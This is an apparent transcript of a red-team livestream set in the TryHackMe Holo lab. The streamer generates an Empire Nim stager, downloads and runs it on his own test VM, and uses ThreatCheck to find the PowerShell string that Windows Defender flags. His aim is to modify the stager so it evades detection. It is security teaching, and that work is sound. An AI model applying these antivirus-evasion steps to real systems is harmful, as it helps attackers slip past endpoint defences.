A hunter must hunt.
All right, here we go. All right, that's looking good. Desktop audio is still playing. That's good news. I think. It is. All right. Just double checking because all of my shit was messed up. Including my hair, which as it happens, I still have not gotten a haircut. Which is a bit of a problem, because I have to do that before Sunday.
All aboard.
Or before Saturday. And I don't know when I'm going to find time during the week, but we'll figure it out. Maybe I'll take lunch and go do it. My hair is getting too long. Star was here a minute ago. She was here a minute ago. She hopped down when I went to get water. My goodness, Securitors with the raid right at the beginning. My goodness. We're just getting started. I literally just came on camera. Okay, that's got to come down a little bit. That's like ear splitting. That's got to come down just a smidge. See, the audio, I had the audio where I wanted it. And then it was all messed up. But welcome to all of Securitors' viewers. We're just getting started. We're going to do some great freaking stuff today. We got TryHackMe's Holo network. We're going to hack into the TryHackMe's Holo network. We're already a good ways in. But we're going to show off a little bit of Antivirus Evasion today. I'm going to go a little bit further. Last time I demonstrated an AMSI bypass. But today we're going a little bit further. I'm actually going to modify one of the binary payloads. One of the binary.exe dropper payloads that Empire generates, and we're going to make that get past Windows Defender, okay? That's what we're going to do today, and we're going to see, if we can get that done quick enough, we'll see if we can get any further into Holo. I'm hoping maybe if we go fast enough, we may be able to get domain admin, okay? We may be able to get to that domain admin. My goodness, we have so many new things happening. Okay, 11 months from Ghost. Thank you so much. Sorovi with the 7 months. Lyso with the first time indoctrination into the passionate club of cephalopod enthusiasts. Thank you so much, Lyso. Thank you so much. Zero Ciaran bringing us 3 new cult initiates. Looping PY, Hunter, and Game Dadel. Welcome, my friends. Mill with the 69 Tiggle biddies. All aboard indeed. Securitors with thank you so much again for the raid. I hope you had a good stream. Madara Yanko, Domab, Manu Mania, and Miki Minoru. F2, I guess Ferv? Tuki Gamer, 10 Noob 01, Joda 11, Gunez, Securitors, and Booyak. Thank you for the follows. Cthulhu Cthursday to all of you. Cyber Payload with the 100 Tig old biddies. We haven't even done anything yet, and Cyber Payload has given us them Tig old biddies. Thank you so much, Cyber Payload. Did we talk about the new exam? No, we talked about the new exam last time. I mean, I don't really have a whole lot else to say on it, other than someone did point out that my previous advice was to run Auto Recon or Legion, and while you did the buffer overflow, and now there isn't guaranteed to be a buffer overflow, and if there is, it's only going to be low priv. So what do you do then? I would still recommend you start off by running Auto Recon or Legion, and then you just start manually enumerating common ports, like on various machines, like port 80 port 445 with crackmap exec. Get a sense of what operating system all the targets are, and et cetera, et cetera. Make sure you're reading the directions as well. Some people don't do this. Make sure that run auto recon right at the beginning when you get the IP addresses, and then while it's running, make sure you read the directions and familiarize yourself with what you're dealing with. With what you're trying to accomplish in every individual target. The instructions will give you data on each individual target as far as what is required to be delivered and how much points they're worth and things like that. So yeah, there's that. I mean, just make sure you're working efficiently because the OSCP exam is all about a workflow. Booyak! Thank you so much for tuning in from Securitus' stream. My goodness. Excalibur. 20 more cult initiates. My word, Excalibur, you are out of control. This man is lost in the passionate, in the esoteric lunacy, the eldritch madness.
A hunter must hunt.
Oh my goodness, Excalibur, I haven't even gotten started. We haven't even gotten any of the good shit yet. Glad to be back on the stream. Started my first pen test job at the end of December on my first internal pen test. Got a shell on an XP box and got domain creds and ran it through CME. Found there was access to a file server. Yep. Including all the users folders. Also included an IT guy's share. .docx with all of his domain creds. Only a matter of time before I get to AI on Blue Ball. Dude, that's fucking great, Excalibur. Congratulations. That's got to be good, right? That's got to feel good, right? Getting domain admin on your first ever assessment, realizing that you can actually do the thing after doing it in CTFs and in certifications for so long. That's just a satisfying feeling. Well done, Excalibur. Well done. It's clearly you've learned well. Island Hugger bringing us three more with 4 months, of prime indoctrinations into the passionate club of cephalopod enthusiasts. Welcome back to the All Has Red team. When you show imposter syndrome, who's the imposter? Whoever is the most sus. Alrighty. We got a lot to cover today. We got a fucking lot to cover. Oh, someone asked about when we're doing the stream with my brother. My brother currently has COVID, so he's fine. Yeah, he is fine. He's just kind of feels like shit. So we're gonna give it some time. He's not streaming at all right now, is my understanding. He's isolating. So he's gonna be down for a bit. Yeah, that Omicron has got us all has got us down pretty hard right now. So once he is back, once he's feeling good, we'll be doing that. Probably in the next couple of weeks, we'll be doing that at some point. Sorry you have to wait for that. I know you guys did meet that incentive. We do want to do that. We are going to do that. We just had the holidays and now he has COVID. So he's doing fine. He's all right. He's just isolating. Got a cough. The mild symptoms. Just kind of feels like crap, just in general. Alrighty. My goodness, Excalibur, I can't even click my way through all of these new cult initiates. Oh my goodness. Alright, let's just hop into it. Okay, what are we tackling today, alright? What are we tackling? So last time we did Holo, we did more of Holo's network. We ran afoul of Windows Defender, okay? Our old nemesis, Windows Defender, okay? We did get past it. We did have some struggles with Empire and it setting certain default setting certain functions, certain parameters by default that Al was an idiot and didn't think to check. So that was I'll take the hit on that one. But regardless, I don't think we delved as deep into antivirus evasion last time as we potentially could have. So today we're going to take it a little bit further. We're going to go a little bit more into the realm of antivirus evasion. Obviously, this is a very deep and abiding topic. But today, I think we're going to take one of the Empire modules, one of the payload generation modules, and we're going to modify it to get past Windows Defender. So what is this going to take? It's going to take us first generating a normal version of this payload and testing to see if, first of all, if it's caught by Windows Defender, and second of all, finding exactly what about the file is being caught by Windows Defender. Then we simply go on over to, we have to modify Empire itself, or at least one of its modules, and cause it to generate that payload a little bit differently so that it doesn't include that little, that portion that's being flagged by the antivirus. So that's what we're going to be doing today. We're going to see if we can make Empire generate some executables that will get past Windows Defender. Does that make sense? Creative Coffee with the 5-month re-indoctrination into the passionate club of cephalopod enthusiasts. Welcome back to the All Has Red team. Not just changing strings, right? Well, a lot of times that's what it comes down to, Ghost. Like, believe it or not, most antivirus is still just signature-based. And even behavioral, even heuristic detection is also signature-based. It's just like, instead of flagging on ASCII strings in a file, it's flagging on a certain series of events, a specific series of events happening in sequence. Okay? So, antivirus evasion is really just about making things look uncommon to the antivirus evasion, okay? So we're only operating with Windows Defender today, but Windows Defender, as far as signature-based antivirus goes, Windows Defender is among the best out there, believe it or not. It is still bound by the limitations of signature-based antivirus. Keep in mind, we're not just changing strings in the executable, Ghost. We have to modify Empire itself to generate the payload differently. So I imagine we're going to be dealing with Python. We're going to be doing a little bit of Python programming today. I imagine there'll be another programming language involved too, because we're not generating Python payloads. The Python Empire is written in Python, and then it's generating payloads in other languages. What makes it one of the best? Good question. Two things. Two primary things. Number one is AMSI. AMSI basically integrates Windows Defender throughout all of Windows. Back in the days when Windows Defender was generally considered a joke, which was not too long ago, this was before AMSI. So Windows Defender would scan executables that were dropped onto disk, but people would just use PowerShell. PowerShell-based payloads, and Windows Defender would never even scan those. Then Microsoft released AMSI, which allowed Windows Defender to scan PowerShell, to scan VBScript, to scan VBA macros, it allowed Windows Defender basically full integration throughout Windows. And not only can it scan like PowerShell.exe and so on and so forth, it can also scan, like, basically whenever the common language runtime is being loaded into memory, AMSI is loaded as well. So loading .NET executables just directly into memory is also AMSI aware. .NET Reflection is also AMSI aware now. Windows Defender is mostly, although bound by the limitations of signature-based antivirus, they've done a good job of integrating it throughout Windows, so that there's not really, there aren't too many clear ways to just bypass it anymore, like there used to be. So you do have to, like, take it into consideration. Windows Defender deleted the file. Apparently found suspicious enough to delete it, and I barely saw that. Oh yeah, you mean my cheat sheet? Yeah, you're gonna have to add a exclusion for that in Windows Defender. I have an exclusion for my notes as well because Windows Defender constantly flags on them. Do you have OSEP or OSCE, or have you learned this by your own? I have OSCE, the old OSCE. I have not taken OSEP. The techniques we're gonna do today were learned on my own and through other certifications like Certified Red Team Operator. What's the second reason? I said two reasons. Did I not give a second reason? I said it's integrated all the way throughout Windows. And then what else did I lost my train of thought on that one. Oh yeah, telemetry. Good call, Mill. Okay, telemetry. Microsoft's telemetry is very, very fast. Okay, so Microsoft basically has the benefit of looking at millions of devices at all times that are all talking to, that all have their antivirus software talking to Microsoft. So when it sees new threats, Microsoft is pretty quick to identify those and add signatures to the database to flag on those things. So that's also another reason why Windows Defender is effective. Again, still bound by the general limitations of signature-based antivirus, as I'm going to demonstrate today. We are going to demonstrate today that Windows Defender does have limitations. And we're going to specifically discuss what those limitations are and how to get past them if you're a pen tester or red teamer. A guy I worked with told me Defender is too aggressive, that it's deleted the VM he was developing malware on. I tip my hat to it. Definitely a force to be recognized with. Yeah, that is a double-edged sword because it also... Windows Defender is terrible with other forms of antivirus. You basically can't use any other forms of antivirus if Windows Defender is in operation. If you're using Carbon Black or Symantec or McAfee or whatever, you pretty much have to put Windows Defender into passive mode because the active mode will it hates other antivirus vendors. So that's pretty common. And yeah, you do have to disable Windows Defender. You have to add a lot of exclusions in Windows Defender, which, again, is a double-edged sword. If you make your antivirus too much of a pain in the ass, people are just going to disable it, which removes the point of even having antivirus in the first place. I think it kept turning itself back on somehow. That's what I heard. Yeah, it'll do that. If you just turn off real-time monitoring, it'll turn itself back on at some arbitrary point in the future. It really doesn't like to be turned off, but you can disable it by group policy. Like on my work laptop here, you can't see it. It's off screen. But on my work laptop, my primary operating system is Windows 10, but it's running Commando. It's running FireEye's Commando VM, which is like a... it's like an attempt to have a Windows penetration testing distribution. So it's like Windows Kali Linux. So obviously, Windows Defender can't be... Windows Defender cannot be in operation on there. So I have it disabled via group policy. If you turn Windows Defender off via group policy, it stays off. It does not just randomly come on at any given time. Is it only me that doesn't use any AV or Defender? I have Defender on my host that I'm talking to you guys on right now. It is not on my my work laptop. It is not on, and there are a lot of exclusions on my host that keep it from interfering with my operations. I don't do most of my operations take place inside of VMs, so Windows Defender doesn't really look at those. All right, let's take a look-see. You ever heard of CrowdStrike Falcon? Yeah, I have gone up against CrowdStrike before. It's pretty good. It's pretty good. One of the best endpoint protections out there that I've found is Microsoft Defender for Endpoint. It used to be called Microsoft ATP, Advanced Threat Protection. ATP is real fucking good. It's very good. It stops a lot of it. I can get stuff to run against it without too much of a problem. I can get stuff to execute. But it produces alerts, and I would like it to not produce alerts. So yeah. Where's your cheat sheet? It's on my Patreon. Alrighty, let's start up Holo. Let's get logged in. Let's start with Holo here. We can feel free to keep up this discussion. By the way, this is a great discussion. But I do want to start at least getting set up. Did I start my Windows VM? We are going to need my dev Windows VM as well today. So we make sure to get that started. And I have Teams installed on that because I was working on a DLL sideload. Again, to get past ATP. We couldn't get any payloads to run on ATP, so we had to do a DLL sideload. Against Microsoft Teams. Which we did get to work, by the way. We managed to perform a DLL sideload attack against Microsoft Teams. I was thinking about doing a Patreon video on that specific topic, like how to do a DLL sideload attack. Because it's pretty cool. It's both persistence and a shell at the same time. You get your beacon, but you also kind of have persistence. It's pretty good. It's pretty good to know how to do DLL sideloading. That's the way to get past a lot of antivirus or endpoint protection these days. Okay, we're logging into TryHackMe here. God, I hope that was the right password. It was not. Fuck. Oh my god, the fucking CAPTCHA. I can log in to TryHackMe, I swear. There we go, we're logged in. Good work, team. Half the battle is over. Alright, Holo. Prepare your Ayayas and your Vohiyos, okay? Because we're going back into Holo. Let's take a look, see. Where are we at? Alright. So, first thing we compromised, I think, was this. I think this is the Docker container. So we first compromised this Docker container. Never understood that IAI. It's a Twitch emote. It's a Twitch emote of an anime girl, just a guy. We're bringing it up because there's a lot of... HoloLive is like a VTuber thing. It's like an anime girl VTuber thing.
A hunter must hunt.
So we compromised this Docker container that there was a web application running in. We escaped from this Docker container onto the host using an exposed MySQL endpoint. And then we pivoted over here to this Windows machine. This Windows machine is where we encountered Windows Defender. We did manage to bypass Windows Defender and root this sucker. We did not do any post-exploitation because the stream was 5 hours last time and I had to stop it at some point. But that's where we are right now. Today, we're not going to be touching Holo just yet. We're going to go into Empire. We're going to take a look at some of Empire's payloads and choose one to modify for our purposes. Synux with a 2-month re-indoctrination into the passionate club of cephalopod enthusiasts. Welcome back to the All Has Red team. Frodo Sagbag, welcome. Thank you for the follow. Welcome to the stream. Alrighty, so we are ready to go. So let's go ahead and pop into Kali. So here we are. Here's our nice Kali. We don't need to connect to any VPN right now. But instead, we are going to... Let's go into TryHackMe. Holo. We'll just start Tmux anyways, because we are going to do Holo at some point. Alright, so now we have to... start up Empire. So it's... If I remember right, it's sudo PowerShell Empire and server to start the server. So we'll do that. So chat did decide. So in the Holo walkthrough, it has you use Covenant. That is totally fine. That is totally reasonable. We are using Empire. The white my eyes. Oh, you mean the yeah, I forgot to I've been meaning to add like a little transparent square around the chat here to keep it to keep this stuff from blotting out the chat because the chat is in white. I realize that. Doesn't the PWK cover Empire? It might. I'm not sure. I haven't seen the updated PWK lab material. All right, so we do have Empire listening. Again, you could use any C2 in its place. The techniques we're teaching today will be generally applicable to all C2 frameworks out there. And what do I mean by generally applicable? Like, obviously, the same code is not going to work. But the same techniques adjusted for whatever framework you're using it, for the implementation in whatever framework you're using it in, will be applicable. Is Empire actually used in the industry? You bet it is. Empire's actually pretty good. As far as C2 goes, I would prefer it to Covenant. I sure prefer it to Covenant. I don't think either of them is the best on the market. There's an unquestioned leader in the market, and neither of them is Empire or Covenant. But obviously I'm going to use the best tool available. But ultimately, as far as open source tools will take you, Empire's fine. So is Covenant. Covenant is also fine. But if you don't have access to commercial tools, then Empire is fine, Covenant is fine. These tools are plenty okay. All right. I just recommend that if you're going to use open source tools in the field, you're going to need to be ready to modify them. Okay? You're going to need to be ready to play with them like we are today. What's the best commercial tool? It's unquestionably Cobalt Strike. Cobalt Strike is unquestionably the best C2 tool on the market. That's not an opinion. It just is it's a fact. Cobalt Strike is the best in the biz. But it is a $4,000 license. And if you don't have a company that's paying for a $4,000 license for Cobalt Strike, chances are you're not using Cobalt Strike, which is fine. So it is fine to use. It is fine to use open source stuff. But if you have the means to get Cobalt Strike, it doesn't get any better than Cobalt Strike. As old as Cobalt Strike looks, like when you fire up Cobalt Strike, its interface is fucking ugly. It's using this gross Java interface from fucking 2003. It's awful. It hasn't been updated in like 20 years, and it shows. It's god awful. That being said, though, its capabilities under the hood are its shitty Java GUI interface belies its absolute fucking monstrous capabilities under the hood. And by the way, what makes Cobalt Strike so good is how modifiable it is. With every update, Cobalt Strike becomes easier to twist to my whims. I can customize everything, and I can customize nearly everything in Cobalt Strike these days. It has its own scripting language that you can script stuff out in. Everything from payload generation to code injection to like all the post-exploitation tools. All of it is customizable in Cobalt Strike. So you can add new commands. Cobalt Strike is highly modular and customizable, which is really why it's so good. Because every shop is going to mold it, and it's going to look a little bit different for everybody. And it's got such a good base that you're operating on. But we're not worried about Cobalt Strike today. We're not using Cobalt Strike, because every time I've used it on stream, everyone in chat is like, Mr. Streamer! How dare you use this commercial tool? As if I'm somehow breaking some kind of rule for using the tool that I'm most familiar with. Sorry, I'm a professional in the industry, and professionals use Cobalt Strike. Okay? Professional red teams are not fucking around out here. Are not fucking around out here with Empire. Okay? I do say Empire is good. For an open source solution, Empire is perfectly adequate. Okay? That being said, if you're a professional red team in the industry, you're not fucking around with Empire, okay? You don't get out of bed for anything less than CBS, okay? You get out, or CS or whatever what Cobalt Strike, okay? And yeah, you got to use Cobalt Strike. And look no further than one of the most well-publicized and sophisticated intrusions in recent memory, which was the SolarWinds intrusion. Does everyone remember FireEye? FireEye discovered the SolarWinds intrusion because they discovered their own network was compromised. And there was a well-publicized breach of the SolarWinds Orion source code, which resulted in basically the SolarWinds Orion software getting backdoored. An extra DLL was modified to do stuff maliciously and talk back to command and control servers. But that malware was not used by these actors for day-to-day operations. Once that malware was their low and slow backdoor. Okay? That malware was their low and slow backdoor in case their day-to-day operations on FireEye's network were discovered. And guess what they used in their guess what this sophisticated APT, one of the most sophisticated hacker groups out there today. Obviously, Metasploit. They were not fucking with Metasploit. They were not fucking with Empire. They were not fucking with Covenant. They were fucking with good old Cobalt Strike. Big Daddy Cobalt Strike. Okay? They used their SolarWinds backdoor to load Cobalt Strike beacons. And they were using Cobalt Strike beacons to conduct day-to-day operations because Cobalt Strike is just that good. With a highly modified C2 profile. Malleable C2 profile. Was Tiberius using Zap? He has a redemption like me to use Zap on his payload. Or Zap on his stream. So, I do use Cobalt Strike on stream now and then because that's what I'm familiar with. Okay? I'm sorry, I'm a professional in the industry. But, today we're using Empire. Okay? So, we started the Empire server. You can see it right there. Let's load up the Empire client. I never saw you using Cobalt Strike. I used it... I think I used it against Throwback, and I used it against Osiris. I definitely used it against Osiris. And I also demonstrated it in the CRTO labs. I used it in the CRTO... I used it in the CRTO labs as well. I streamed the CRTO labs for a while, and I used Cobalt Strike in there, you betcha. Mo Wadafi, thank you for the follow. Cthulhu Cthursday to you, my friend. So, we do have listeners. Now, let's remind ourselves. All right, so we had this default HTTP listener. Now, we did fuck this up last time, so let's go ahead and help. Again, I have list options, default HTTP. So what we fucked up last time was this. And I see now that it is back to what it was before. I'm wondering if Empire set it again. We'll see. It doesn't really matter for right now. It's set to what I need it to be at, which is this is not my IP address on Holo's network. This is the local IP address on my local network for my Kali VM. We need to have that set properly. This setting was set improperly last time. So we have a bunch of options. This listener should be just fine for what our purposes are. And we go back. Now we want to look at the stagers. Use stager. All right, so it gives you, if you can see down here in this drop-down menu, it actually gives you quite a few. We want to use a Windows one, obviously, because we're not dealing with Mac OS. So we have quite a few potential Windows ones. There's a DLL. There's a NIM payload, which, come to think of it, do we not want to modify the NIM payload? Actually, the NIM payload had a really, really weird functionality last time, if I remember right. The NIM payload was all fucked up. All kinds of fucked up last time. So I'm actually really curious what kind of fucking spaghetti code they've written for NIM here. But it's very impressive that they even have a NIM payload in the first place. But I'm actually really curious to take a look at what kind of fucking spaghetti code is making this shit. But you see they have C#. They have WMIC 1, HTA 1, all kinds of stuff that you can use. For right now, let's focus in on... Let's just do the NIM one. Is everyone okay with the NIM one? I've been interested in the NIM programming language quite a bit recently. And I think that this one sounds pretty fucking cool. What is NIM? NIM is an obscure programming language that's gained a little bit more traction recently because it's basically perfect for offensive tool creation. It's even better than Go. Go is excellent for creation of offensive tools, but NIM is even better than Go for this purpose. Is it like Vim? No, it's a programming language. Nim is a programming language. It is so the thing with Nim, okay, is that it's written in a syntax kind of similar to Python, a bit similar to Python. However, when it is compiled, and when you compile it, it's first converted into C. It is converted into C source code and then compiled as C, which is pretty cool. Do you write Nim in Vim? Sometimes. Usually I write it in VS Code. VS Code is really good with Nim. It seems to be the best option for Nim development right now. I've written a fair bit of Nim myself. Again, it is a small, obscure programming language. But what benefits do you have of maybe an obscure programming language? Are there any inherent benefits to an obscure programming language? For our purposes as attackers. AV cannot catch. Yeah, it looks almost alien to AV. AV doesn't really know how to scan it, doesn't really know how to deal with it. There aren't going to be too many malicious strings for Nim. And Nim is also cross-compilable. With a simple different compiler flag, you can compile executables for Windows, for Linux. You can even compile JavaScript. You can even convert Nim into JavaScript. So Nim can do a lot of things. Cross-compilation compiles down into these nice, really compact C binaries. It's very good for offensive tooling. Okay? Just checked out a Nim example. Looks really nice and simple. The biggest deficit to Nim is that it's not well documented. If you're getting into programming in Nim, you're going to kind of get into tinkering. Because Nim is not nearly as well documented as things like Python. You're not often going to find Stack Overflow posts that clear up whatever you're trying to do in Python. What language resembles Nim? Probably Python resembles it the most. It does have some key differences from Python, though. Okay, let's take a look at the Nim stager first, okay? Let's just see what the Nim stager looks like. I think we did use it last time. I think we did use this last time. And I think it had some really strange behavior that we want to see if we can fix. Okay, so we want to set listener. We want to set the listener that we're going to generate a payload for to default HTTP. Okay? Let's do options. Okay, so by the way, Empire has built-in bypasses here. So you can have it. You can play around with that. We're not going to do anything with that today, because if I'm going to demonstrate AV evasion, I'd like it to be a little bit different from like just setting a different bypass value in Empire and letting it go to work. I think it's more interesting if I do it manually. So language PowerShell, which is interesting. So how are we this kind of makes sense from what I remember seeing the artifacts of the Nim payload last time, and I have a suspicion as to what it's actually doing. Obfuscate the launcher PowerShell code. So again, you can add obfuscation options here as well. You can obfuscate the PowerShell command. You can do all this stuff. But again, I think it's better if we just modify the source code itself. I think it gives you a better understanding of how Empire works, and also how Nim works, how AV evasion works in general. So I'm going to leave these options to false, but just know that you could certainly play with these.
Mr. Streamer, we want you to choose a battle in Stream Raiders.
Okay, let me start up Stream Raiders. I've completely forgotten about Stream Raiders today, but thank you so much for those 500 Tiggle biddies. You certainly didn't need to cheer 500 Tiggle biddies just to get me to start Stream Raiders, but I do appreciate it. Do you need to bypass AV if you use Nim? We did use it yesterday, and I think it did get caught. Or not yesterday, but on Thursday. We did use it on Thursday, and the default payload did get caught, I believe. But we're going to make sure it doesn't get caught today. Don't you worry. I am going to... again, please keep in mind, I am going to leave... certain things... I'm going to leave these obfuscation options at a baseline value. so that we can do this manually, which I think is a little bit more interesting for all of us. Okay. I'm starting up Stream Raiders, by the way. It's just taking a second. All right. Which pathway do we want to go? Probably down here, huh? All right, we're starting a battle. There we go. Okay, and there we go. There's your Stream Raiders. I apologize, I forgot entirely about Stream Raiders today. There we go. Okay, so again, these commands like bypasses, obfuscate command, all these things. ETW is this is to bypass endpoint protection or attempt to bypass certain endpoint protection hooks. Can anyone explain C2 server in layman's terms? Sure. C2 stands for command and control. So when you're on network, when you're on network on a network of 1,000 hosts, let's say, which is pretty common in the modern landscape, it becomes pretty unwieldy to have reverse shells for everything. Would you agree with that, Just a Guy? Just having a separate reverse shell for every machine you compromise? Because you're usually having to manage a lot of machines that you've compromised. So the C2 server is basically the answer to that exact problem. So instead of a different reverse shell, you'll have a command and control server set up, which is going to be in Cobalt Strike or Empire or Merlin or Sliver or Covenant or whatever. And by the way, another problem is that you usually have more than one person. So you need multiple people to be able to access all those machines that are compromised. So you're typically going to have all those machines talking to a single server. And there's going to be a little backdoor payload that's running on the target that talks to your C2 that talks to your C2 server, and then all of your hacker buddies connect into the C2 server and perform operations through that. That's basically how C2 works. That's what we mean by when we say a C2 server. That's what Empire is. So, again, you could certainly obfuscate. This looks like this is invoke obfuscation. This looks like the invoke obfuscation here, which is a PowerShell script used for obfuscating PowerShell. I didn't know Empire had that integrated, so that's pretty cool. So certainly, I think probably if you use these three things, you probably would be able to find a combination that gets you past Windows Defender. Okay, but again, we're not going to use these today. Maybe we'll take a look at them a little bit later, or what options there are. But we're going to do it manually for right now because I think we're going to get more brain wrinkles by doing that. Okay? All right, so let's just go ahead. We set the listener to default HTTP, and that's really all we have to do. So now we'll go ahead and we're going to hit execute to generate this. Let me get water really quickly and turn down the heat because it is warm in here. Alrighty, we back. We called it something else? Yeah, sure. There's probably a lot of words you could potentially use for it. So we see that launcher.exe has been lit into varlib, PowerShell Empire, launcher.exe. Okay? So let's see what that looks like. I think it's probably... I didn't mean to type Vim. I meant to type CD. There we go. Okay, so here's our generated payload here. We can see it's actually fairly small considering this is a cross-compiled executable. So if we wanted to, we can let's take a look at what launcher.exe is. It's a 64-bit executable for Microsoft Windows. Yeah, and that's all it basically says about it. Okay, that's all it basically says about it. So let's sudo python 3 TACM http.server. We'll make it port 81 because I think my listener is listening on port 80. Okay, so now let's go on over to my dev box here. This is my dev box. Welcome. Let's go ahead and disable Windows Defender for the moment. And we will test it against Windows Defender momentarily. But we're just going to turn this off. I just want to see what the payload looks like when it executes. Because if I remember right, we had some really weird behavior by this particular executable last time. So we'll run this as administrator. Let's cd users, IE user, desktop, Mukter, Empire, experiments, cd Empire experiments, and now we can wget http:// 10.0.0.183/launcher.exe. Forgot the port. Port 81. Okay, there we go. So we do see launcher.exe. Now let's see what happens when we execute this. Okay. So I have a couple of guesses as to what this is doing. And, yeah, I'm pretty sure I know exactly what this is doing. But we're going to take a look at the NIM source code here in a little bit. So I'll leave that for a little bit. First, I want to note, what immediately do we see here that is the problem? What immediately do we see here that is the problem? The fucking console. The fucking console. So imagine you're a user. You're tricked into executing launcher.exe. This motherfucker pops up with all this kind of fucking gibberish in here. This is fucking god awful. This is terrible. Like this is the last thing that you want. This is absolutely fucking god awful. I don't know why. I have a suspicion as to what exactly is causing this. But I don't know why it's showing. I don't know why it's giving us debugging output. We're going to have to take a look at that. But let's take a look at what we have over on our Linux side. So we see new agent checked in. Now Empire assigns a random name to the agent. So the Empire executables are the Empire, I guess you call them rats, remote access Trojans, are called agents. Cobalt Strike has beacons. Cobalt Strike has beacons. Covenant has grunts. And so on. We all have our cute names for our C2, for our little C2 backdoors. So let's go in. Let's check out agents. Let's see what agents. We see that we're reporting this particular agent checking in. Last checked in 3 seconds ago. I believe the default sleep time in Empire is 5 seconds. So basically, the agent is calling back every 5 seconds and looking for instructions. Yeah. And if we can interact with this agent, we see that this is giving us a basic idea of like what kind of machine you're running in, what your username is. We're IE user, which is my user on my dev box over there. What the delay is, which is 5 seconds. This 0.0 refers to jitter. Jitter is kind of a randomized variation in the callback delay. Like it can be a little bit suspicious if you have a machine on your network talking to a strange domain every 5 seconds, like on the dot, like literally like clockwork every 5 seconds. So it's the jitter helps to randomize that a little bit. What process ID we're running in, what listener it's talking to, and so on. So we can hit interact, and now we're interacting with this agent. What kind of commands can we run here? So Empire has a variety of things that you can do called modules, like Metasploit modules. But these are all for like post-exploitation. They're going to be like Mimikatz and you see that Sherlock is built in here for privilege escalation purposes. You've got Mimikatz. You've got PS inject, which is going to it's going to inject some PowerShell code inside of a inside of a process. We have it can do some token stuff now, I see too. Interesting. A lot of these commands ideas were taken from Cobalt Strike, like Steel Token, and Shell Inject and things like that. But these are all post-exploitation modules you can do. Let's just run Who Am I right now and see what we can, what happens. So yeah, so the agent, we give a command to the agent, and then when the next time the agent checks in and goes, "Hey, have any commands?" And then the team server is going to tell them, "Yeah, run Who Am I for me and return the output." And then the agent will run that command, and then return the output to the server, and then it goes back to sleep until the next time it checks in. That's how these agents work, basically. So Empire is a framework. It's a C2 framework. Yeah, I guess you could call it that. Yeah, it's fine. Does everyone understand how Empire works at a basic level? How these agents are working? So, my immediate concern here, not only with this console, but what happens if I do this? Does that kill my agent? My immediate concern is if someone closes that, does that kill my agent? Let's try running Who Am I now. Uh-oh. So not only... This is dog shit, by the way. This is, in the business, we would refer to this as complete dog shit. Okay? So, not only when we execute this... Not only when we execute this does it make a big scary console pop up, but if anyone exits out of that, console, it looks like we just lose our agent. We're just done. Yeah, checked in a minute ago. This agent is no longer checking in. What is happening? Yeah, you want the beacon to run in the background. Ideally, you don't want to arouse any suspicion. You want it to blend in with background processes. You don't want anyone to know that that something is happening in the background, okay? This is very, very bad for that. This is basically useless. This default executable is basically useless to me. It really is of absolutely no use to me. I would not want to use it on a real assessment. It's sloppy. It's ugly. It doesn't self-delete itself or anything. Real bad. Okay? Really, really, really bad. So it's just for testing purposes. I don't know really what it's for. I think someone on my guess is that someone on the Empire team just said, "Hey, it'd basically be cool if we had a NIM payload." Wouldn't that be cool? And then a guy probably slapped it together in an evening without really understanding it. We're going to take a look at the source code here in a second. We're going to figure out exactly why it's doing the things that it's doing. And then they just pushed it. And this is what is resulting. So we're going to... This is good. This is great. This is fantastic. We're going to help Empire out a little bit, okay? Right here on stream, in front of 200 people... We're going to help Empire out a little bit, okay? I'm going to lead them to the light. I'm going to show them how to make a NIM payload that isn't complete dog shit, okay? Data module, is that where it's located? That's where I needed to figure out next. Where is this what are the files? So I believe that the server is executing this. Yeah. So we see this is output from the NIM compiler here. I recognize this because I code in NIM. This is output from the NIM compiler. We can see what libraries it's loading and things like that. Where is it? It looks like there's a temp launcher.nim. Is there a launcher.nim in the temp folder? I would like to see what this looks like. We do see launcher.exe. I wonder if that's from last time. But there is no launcher.nim here. So it must delete the payload before... Oh, another thing we can take a look at. Another thing we can take a look at really quickly is we can see let's see if Windows Defender is going to flag this. Okay, let's see if Windows Defender is going to flag this. Turn this on. Let's scan with Windows Defender. Skipped an item due to an exclusion. Okay, never mind. I have an exclusion. I have exclusions all over the place in here. Let's use Defender check instead. So let's open another PowerShell prompt here. I don't have Microsoft Terminal built in here. Let's start in here. I need to install it in here, honestly. Tools. Threat check, I think, is Rasta's implementation, which I do use. All right, so threat check. So what threat check does? So threat check automates the process of what's the difference between Defender and threat check? They're just different ways to do the same thing, basically. Threat check is a strict improvement over Defender check. Okay, so what threat check basically does, yeah, threat check has AMSI. It does have AMSI, so it's good for PowerShell scripts as well. But basically, what threat check is going to do, and you're going to see it when we execute it, it's gonna scan the executable that we give it with Windows Defender, and if it flags, then threat check is going to divide the executable into two. It's just going to cut it in half into two separate files, and then it's going to scan both files with Windows Defender, and then it's going to find out which one of those flags. Because ideally, when you scan a file with Windows Defender is going to find a malicious string in it, more than likely, or a malicious function call or something like that, and it's going to flag the file based on that. We need to find exactly what part of the file is being flagged on by Windows Defender. We need to know exactly what kind of file is what string is being flagged on. So let's see if we can get any insight. Again, we are going to have to look at the source code. We are going to do that, of course. So here's threatcheck.exe. TACF, users, IE user, desktop, Empire, experiments, and launcher.exe. Okay, so basically, threat check is splitting the file up a whole bunch of times and trying to find exactly what small part of the file is flagging antivirus. Okay? Here we go. So this looks like just PowerShell, which makes sense, right? That makes sense because we saw that the launcher type was PowerShell. So there is a PowerShell string. So this executable is executing PowerShell code, and it looks like this is that Windows Defender is catching that. Okay, does everyone understand that? Does everyone understand that how Windows Defender is catching this? Okay, so the easiest way to bypass it, I mean, you could just you could change it to not use PowerShell, but again, let's just focus our efforts here. There's a lot of ways that you could make this. We just need to make this string not show up in the final payload. There's a lot of ways we can potentially do that. Okay, so let's. We now know what our goal is. We're gonna find the PowerShell launcher script. We're gonna modify it in some way so that it does not flag antivirus anymore. So let's go ahead and take a look. Let's hop on over here. Now, where is this? Does it give me any information as to where the modules are stored? User share PowerShell Empire appears to be the default. So let's cd user share Empire. Data? It's not that. That looks like that's the SSL certificate stuff. Empire. Server. Compilation, as we saw, happens on the server side. Stagers. There's one for stagers. Windows. nim.py. Right here. Do we see that? I bet you that looks like it's the module. Now again, remember, Empire is written in Python. So my guess is that is ThreatTrack free? Yeah, it's on GitHub. So there is a Python module in here, nim.py it looks like, that is creating this nim payload. So let's take a look at nim.py. Let's actually open it in Vim, because it'll give us syntax highlighting. Okay, what are we looking at here? Okay, so creating a class. So here's all the options that we give it. Here's all those options that we saw in the stager options, like obfuscation options and so on and so forth. Obfuscate options, the listener options right here. All those options are being loaded right here. So we see that. So where? Oh, generate. Here we go. So this looks like... Okay, so here it's 